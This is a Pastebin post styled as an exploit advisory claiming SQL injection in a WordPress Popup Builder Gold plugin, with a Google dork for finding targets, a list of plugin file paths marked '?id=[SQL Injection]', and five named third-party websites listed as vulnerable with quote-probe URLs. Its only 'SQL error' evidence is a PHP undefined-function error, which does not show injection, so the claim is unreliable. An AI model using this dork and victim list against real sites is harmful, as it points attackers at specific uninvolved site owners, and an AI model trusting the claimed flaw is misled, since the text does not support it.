KingSkrupellos

WordPress Popup Builder Gold Plugins 3.1.5.2 SQL Injection

Jan 27th, 2019
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.08 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : WordPress Popup Builder Gold Plugins 3.1.5.2 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 28/01/2019
  7. # Vendor Homepage : popup-builder.com
  8. # Software Download Link : downloads.wordpress.org/plugin/popup-builder.3.1.5.2.zip
  9. # Software Information Link : wordpress.org/plugins/popup-builder/
  10. # Software Version : 3.1.5.2
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/wp-content/plugins/popup-builder-gold/''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17.  
  18. ####################################################################
  19.  
  20. # Description about Software :
  21. ***************************
  22.  
  23. Popup Builder Pro [ Gold ] – Responsive WordPress Pop up – Subscription & Newsletter =>
  24.  
  25. Pop up anything with Popup Builder, create and manage powerful promotion modal popups
  26.  
  27. for your WordPress blog or website. Powerful, and yet, easy to use this plugin that
  28.  
  29. will help you to grab your visitors’ attention to introduce them your
  30.  
  31. offers, discounts or other kind of promotional notices.
  32.  
  33. ####################################################################
  34.  
  35. # Impact :
  36. **********
  37.  
  38. * WordPress Popup Builder Gold Plugins 3.1.5.2 is prone to an
  39.  
  40. SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
  41.  
  42. data before using it in an SQL query.
  43.  
  44. * Exploiting this issue could allow an attacker to compromise the application, read,
  45.  
  46. access or modify data, or exploit latent vulnerabilities in the underlying database.
  47.  
  48. If the webserver is misconfigured, read & write access to the filesystem may be possible.
  49.  
  50. ####################################################################
  51.  
  52. # SQL Injection Exploit :
  53. ***********************
  54.  
  55. /wp-content/plugins/popup-builder-gold/config.php?id=[SQL Injection]
  56.  
  57. /wp-content/plugins/popup-builder-gold/popup-builderPro.php?id=[SQL Injection]
  58.  
  59. /wp-content/plugins/popup-builder-gold/files/sg_admin_post.php?id=[SQL Injection]
  60.  
  61. /wp-content/plugins/popup-builder-gold/files/sg_popup_ajax.php?id=[SQL Injection]
  62.  
  63. /wp-content/plugins/popup-builder-gold/files/sg_popup_create.php?id=[SQL Injection]
  64.  
  65. /wp-content/plugins/popup-builder-gold/files/sg_popup_create_new.php?id=[SQL Injection]
  66.  
  67. /wp-content/plugins/popup-builder-gold/files/sg_popup_main.php?id=[SQL Injection]
  68.  
  69. /wp-content/plugins/popup-builder-gold/files/sg_popup_media_button.php?id=[SQL Injection]
  70.  
  71. /wp-content/plugins/popup-builder-gold/files/sg_popup_page_selection.php?id=[SQL Injection]
  72.  
  73. /wp-content/plugins/popup-builder-gold/files/sg_popup_save.php?id=[SQL Injection]
  74.  
  75. /wp-content/plugins/popup-builder-gold/files/sg_popup_settings.php?id=[SQL Injection]
  76.  
  77. /wp-content/plugins/popup-builder-gold/files/sg_subscribers.php?id=[SQL Injection]
  78.  
  79. /wp-content/plugins/popup-builder-gold/files/main_section/ageRestriction.php?id=[SQL Injection]
  80.  
  81. /wp-content/plugins/popup-builder-gold/files/main_section/contactForm.php?id=[SQL Injection]
  82.  
  83. /wp-content/plugins/popup-builder-gold/files/main_section/countdown.php?id=[SQL Injection]
  84.  
  85. /wp-content/plugins/popup-builder-gold/files/main_section/exitIntent.php?id=[SQL Injection]
  86.  
  87. /wp-content/plugins/popup-builder-gold/files/main_section/fblike.php?id=[SQL Injection]
  88.  
  89. /wp-content/plugins/popup-builder-gold/files/main_section/html.php?id=[SQL Injection]
  90.  
  91. /wp-content/plugins/popup-builder-gold/files/main_section/social.php?id=[SQL Injection]
  92.  
  93. /wp-content/plugins/popup-builder-gold/files/main_section/subscription.php?id=[SQL Injection]
  94.  
  95. /wp-content/plugins/popup-builder-gold/files/options_section/exitIntent.php?id=[SQL Injection]
  96.  
  97. /wp-content/plugins/popup-builder-gold/files/options_section/pro.php?id=[SQL Injection]
  98.  
  99. /wp-content/plugins/popup-builder-gold/files/options_section/social.php?id=[SQL Injection]
  100.  
  101. ####################################################################
  102.  
  103. # Example Vulnerable Sites :
  104. *************************
  105.  
  106. [+] fincacanada.org/wp-content/plugins/popup-builder-gold/config.php?id=1%27
  107.  
  108. [+] tusojoseyecare.net/wp-content/plugins/popup-builder-gold/config.php?id=1%27
  109.  
  110. [+] southyubaclub.com/wp-content/plugins/popup-builder-gold/config.php?id=1%27
  111.  
  112. [+] blog.fimple.tv/wp-content/plugins/popup-builder-gold/config.php?id=1%27
  113.  
  114. [+] myomy.co.il/wp-content/plugins/popup-builder-gold/config.php?id=1%27
  115.  
  116. ####################################################################
  117.  
  118. # SQL Database Error :
  119. ***********************
  120.  
  121. Fatal error: Uncaught Error: Call to undefined function plugins_url() in /home/finca520
  122. /public_html/wp-content/plugins/popup-builder-gold/config.php:4 Stack trace: #0
  123. {main} thrown in /home/finca520/public_html/wp-content/plugins
  124. /popup-builder-gold/config.php on line 4
  125.  
  126. ####################################################################
  127.  
  128. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  129.  
  130. ####################################################################
Add Comment
Please, Sign In to add comment